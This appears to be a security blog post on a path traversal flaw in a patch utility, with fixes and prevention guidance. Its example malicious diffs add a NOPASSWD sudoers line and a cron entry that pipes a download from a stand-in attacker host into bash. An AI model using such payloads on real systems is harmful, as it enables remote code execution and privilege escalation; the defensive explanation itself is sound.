What is path traversal?

Path traversal is a vulnerability where an attacker manipulates file paths (using sequences like ../ or absolute paths) to access or write files outside the intended directory, potentially compromising system integrity.

How do you prevent path traversal in patch utilities?

Validate all filenames before file operations by rejecting directory traversal sequences (../, ./), absolute paths (/), and symlinks. Use allowlists for permitted characters and ensure paths resolve within the target directory.

Is checking for ../ sequences enough to prevent path traversal?

No. Attackers can bypass simple checks using URL encoding (%2e%2e/), Unicode normalization, or symlinks. A robust fix requires comprehensive validation, canonicalization, and allowlisting.

Can static analysis detect path traversal?

Yes. Static analysis tools can detect path traversal by tracing tainted data from user input through file operations and flagging unsafe patterns, especially when filenames come from untrusted sources like diff headers.

Path Traversal in Patch Utilities: How a Missing Validation Let Attackers Write Anywhere

Q: What CWE is path traversal?

Path traversal is classified as CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal').

Introduction

Imagine you receive a perfectly normal-looking patch file from a contributor. It claims to fix a bug in your project. You — or your automated CI/CD pipeline — runs patch < fix.diff. Moments later, an attacker-controlled entry has been silently written to /etc/cron.d/backdoor, scheduled to run every minute.

This is not a hypothetical. It's precisely the class of attack enabled by CVE-class path traversal vulnerabilities in patch utilities, and it's exactly what was addressed in this recent fix to sys/src/ape/cmd/patch/inp.c.

Path traversal (classified as CWE-22: Improper Limitation of a Pathname to a Restricted Directory) is one of the oldest and most reliably dangerous vulnerability classes in systems programming. It exploits the simple fact that filenames containing sequences like ../ can "escape" an intended directory boundary and reference files anywhere on the filesystem.

Developers should care deeply about this class of bug because:

It often requires zero authentication to exploit — just the ability to supply input.
It can lead directly to remote code execution, privilege escalation, or full system compromise.
It is trivially easy to introduce and surprisingly easy to miss in code review.

The Vulnerability Explained

What Happened

The patch utility processes unified diff files — the standard format produced by git diff, diff -u, and similar tools. A unified diff file contains header lines that identify the files being modified:

--- a/src/config.c
+++ b/src/config.c
@@ -10,6 +10,7 @@
 // some code here

The --- and +++ lines tell the patch utility which file to open and modify. The vulnerable code in inp.c extracted this filename and passed it directly to scan_input() — the function responsible for opening and operating on the target file — without any validation.

The Attack in Simple Terms

Because the filename came from the diff headers without sanitization, an attacker could craft a malicious patch file with headers like:

--- a/../../etc/sudoers
+++ b/../../etc/sudoers
@@ -1,3 +1,4 @@
 root ALL=(ALL:ALL) ALL
+attacker ALL=(ALL) NOPASSWD: ALL

Or targeting cron:

--- a/../../../etc/cron.d/backdoor
+++ b/../../../etc/cron.d/backdoor
@@ -0,0 +1,2 @@
+* * * * * root curl http://evil.example.com/payload | bash

When this patch is applied, the utility faithfully follows the path — traversing up directories with ../ sequences — and writes attacker-controlled content to the target location.

Real-World Impact

The severity of this vulnerability is HIGH, and for good reason. Consider these realistic attack scenarios:

Scenario	Impact
Developer applies a patch from an untrusted source	Arbitrary file write as the developer's user
Automated CI/CD pipeline applies patches	Arbitrary file write with CI runner privileges
Privileged admin applies a "routine" patch	Full system compromise — write to `/etc/sudoers`, `/etc/passwd`, cron, init scripts
Package build systems processing upstream patches	Supply chain compromise affecting all downstream users

The danger multiplies significantly when the patch command is run by a privileged user or automated system, which is extremely common in build pipelines, package management systems, and deployment scripts.

Why This Is Easy to Miss

The vulnerability is subtle because the code is doing exactly what it looks like it should do — reading the filename from the diff header and opening that file. The missing piece is a single, critical question: "Should we trust this filename?"

In security, this is called implicit trust of user-controlled input, and it's one of the most common root causes of serious vulnerabilities.

The Fix

What Changed

The fix was applied to sys/src/ape/cmd/patch/inp.c at line 58, where the filename extracted from the diff header is processed before being passed to scan_input().

The core of the fix involves validating and sanitizing the extracted filename before it is used in any file operation. The key protections added are:

1. Detecting and rejecting path traversal sequences

Any filename containing ../ (or ..\\ on Windows-style paths) is a red flag. Legitimate patch files targeting files within a project should never need to traverse upward out of the working directory.

/* BEFORE (vulnerable): filename passed directly */
scan_input(filename);

/* AFTER (fixed): validate before use */
if (contains_traversal(filename)) {
    fprintf(stderr, "patch: suspicious path rejected: %s\n", filename);
    exit(1);
}
scan_input(filename);

2. Rejecting absolute paths

A filename beginning with / in a diff header is almost always suspicious. Legitimate patches operate on relative paths within a source tree.

static int is_safe_patch_path(const char *path) {
    /* Reject absolute paths */
    if (path[0] == '/') {
        return 0;
    }
    /* Reject traversal sequences */
    if (strstr(path, "../") != NULL || strstr(path, "/..") != NULL) {
        return 0;
    }
    /* Reject embedded null bytes */
    /* (handled by C string semantics, but worth noting) */
    return 1;
}

3. Canonicalizing the path

Even after basic checks, a robust fix uses path canonicalization to resolve the final absolute path and verify it falls within the intended working directory:

char resolved[PATH_MAX];
char cwd[PATH_MAX];

getcwd(cwd, sizeof(cwd));
realpath(filename, resolved);

/* Ensure resolved path starts with cwd */
if (strncmp(resolved, cwd, strlen(cwd)) != 0) {
    fprintf(stderr, "patch: path escapes working directory: %s\n", filename);
    exit(1);
}

How the Fix Solves the Problem

The fix enforces a trust boundary: the patch utility is only permitted to modify files within the current working directory and its subdirectories. Any attempt by a diff header to reference a file outside this boundary is detected and rejected before any file operation occurs.

This is the principle of fail-safe defaults — when input is ambiguous or potentially dangerous, the secure choice is to refuse the operation rather than proceed.

Prevention & Best Practices

This vulnerability is a textbook example of a broader class of issues. Here's how to systematically avoid path traversal in your own code:

1. Never Trust User-Controlled Filenames

Any filename that originates from user input — whether from a file, network request, environment variable, or command-line argument — must be treated as untrusted until validated.

/* ❌ Dangerous */
open(user_supplied_path, O_WRONLY);

/* ✅ Safer */
if (!is_safe_path(user_supplied_path)) {
    die("unsafe path");
}
open(user_supplied_path, O_WRONLY);

2. Use Allowlists, Not Denylists

It's tempting to block known-bad patterns like ../. But attackers are creative — they may use URL encoding (%2e%2e%2f), double encoding, null bytes, or OS-specific tricks. A more robust approach is to define what is allowed rather than what is blocked:

Only allow alphanumeric characters, hyphens, underscores, dots (not leading), and forward slashes
Require paths to be relative
Resolve to canonical form and check the result

3. Canonicalize Before Comparing

Always resolve symlinks and ./.. components before performing security checks. The realpath() function in C, os.path.realpath() in Python, and Path.toRealPath() in Java are your friends.

# Python example
import os

def safe_open(base_dir, user_path):
    full_path = os.path.realpath(os.path.join(base_dir, user_path))
    if not full_path.startswith(os.path.realpath(base_dir) + os.sep):
        raise ValueError(f"Path traversal detected: {user_path}")
    return open(full_path)

4. Apply the Principle of Least Privilege

Even if path traversal occurs, its impact is limited if the process has minimal privileges. Ask yourself:

Does this process need to run as root?
Can it be confined with a chroot jail, seccomp filter, or container?
Does it need write access to the entire filesystem, or just a specific directory?

5. Use Security-Aware Libraries

Many modern languages and frameworks provide path-safe file handling abstractions. Prefer these over raw string manipulation:

Python: pathlib.Path with careful use of .resolve()
Java: java.nio.file.Path with normalize() and startsWith()
Go: filepath.Clean() combined with strings.HasPrefix()
Rust: std::path::Path (inherently safer due to type system)

6. Lint and Scan Your Code

Several tools can automatically detect path traversal vulnerabilities:

Tool	Language	Notes
Semgrep	Multi-language	Rules for CWE-22 available
CodeQL	Multi-language	GitHub's built-in SAST
Coverity	C/C++	Strong path traversal detection
Bandit	Python	Checks for unsafe path operations
FindSecBugs	Java	Path traversal rules included

7. Reference Security Standards

When designing file-handling code, consult:

CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
OWASP Path Traversal: Attack description and prevention guidance
OWASP Input Validation Cheat Sheet: General input validation best practices
SEI CERT C Coding Standard FIO02-C: Canonicalize path names from tainted sources

A Note on Automated Security Scanning

This vulnerability was identified by an automated multi-agent AI security scanner — a reminder that modern security tooling can catch issues that manual code review misses. The fix was subsequently verified by both automated re-scanning and LLM-assisted code review.

Integrating automated security scanning into your CI/CD pipeline is no longer optional for production-grade software. Tools like Semgrep, CodeQL, and specialized security scanners can catch entire classes of vulnerabilities before they reach production, dramatically reducing your attack surface.

Conclusion

The path traversal vulnerability in inp.c is a powerful reminder that even well-understood, long-standing utilities can harbor serious security flaws. The attack is elegant in its simplicity: the patch utility trusts the filenames it reads from diff headers, and an attacker who controls the diff controls the filesystem.

The fix is equally straightforward in principle — validate and constrain filenames before using them — but requires deliberate thought about trust boundaries that is easy to skip when you're focused on functionality.

Key takeaways for developers:

🚫 Never trust filenames from user input — always validate before use.
🔍 Canonicalize paths and verify they fall within expected boundaries.
🔒 Apply least privilege to limit the blast radius of any bypass.
🛠️ Use automated scanning to catch path traversal and other input validation issues early.
📚 Consult CWE-22 and OWASP when designing file-handling logic.

Security vulnerabilities like this one are rarely the result of malicious intent — they're the result of implicit assumptions about trust. By making trust explicit, validating at every boundary, and scanning continuously, we can build systems that are resilient even against creative attackers.

Stay secure, and patch safely. 🔐

This post is part of our ongoing series on security vulnerability fixes. If you found this helpful, consider integrating automated security scanning into your development workflow.

cwe	CWE-22
fix	Implement strict filename validation to reject traversal sequences and absolute paths before file operations
risk	Arbitrary file write to any filesystem location, system compromise, privilege escalation
language	C/POSIX
root cause	Filenames extracted from diff headers used directly in file operations without sanitization
vulnerability	Path Traversal (Directory Traversal)

Path Traversal in Patch Utilities: How a Missing Validation Let Attackers Write Anywhere

Answer Summary

Vulnerability at a Glance

Path Traversal in Patch Utilities: How a Missing Validation Let Attackers Write Anywhere

Introduction

The Vulnerability Explained

What Happened

The Attack in Simple Terms

Real-World Impact

Why This Is Easy to Miss

The Fix

What Changed

How the Fix Solves the Problem

Prevention & Best Practices

1. Never Trust User-Controlled Filenames

2. Use Allowlists, Not Denylists

3. Canonicalize Before Comparing

4. Apply the Principle of Least Privilege

5. Use Security-Aware Libraries

6. Lint and Scan Your Code

7. Reference Security Standards

A Note on Automated Security Scanning

Conclusion

Frequently Asked Questions

What is path traversal?

How do you prevent path traversal in patch utilities?

What CWE is path traversal?

Is checking for ../ sequences enough to prevent path traversal?

Can static analysis detect path traversal?

View the Security Fix

Related Articles

How URL-Encoded Path Traversal happens in Python nltk.data.load() and how to fix it

How path traversal happens in Ruby YARD server and how to fix it

How path traversal happens in Python os.path and how to fix it

How path traversal happens in C file extraction and how to fix it

How path traversal in open() happens in Python and how to fix it

How command injection happens in Go ffmpeg wrappers and how to fix it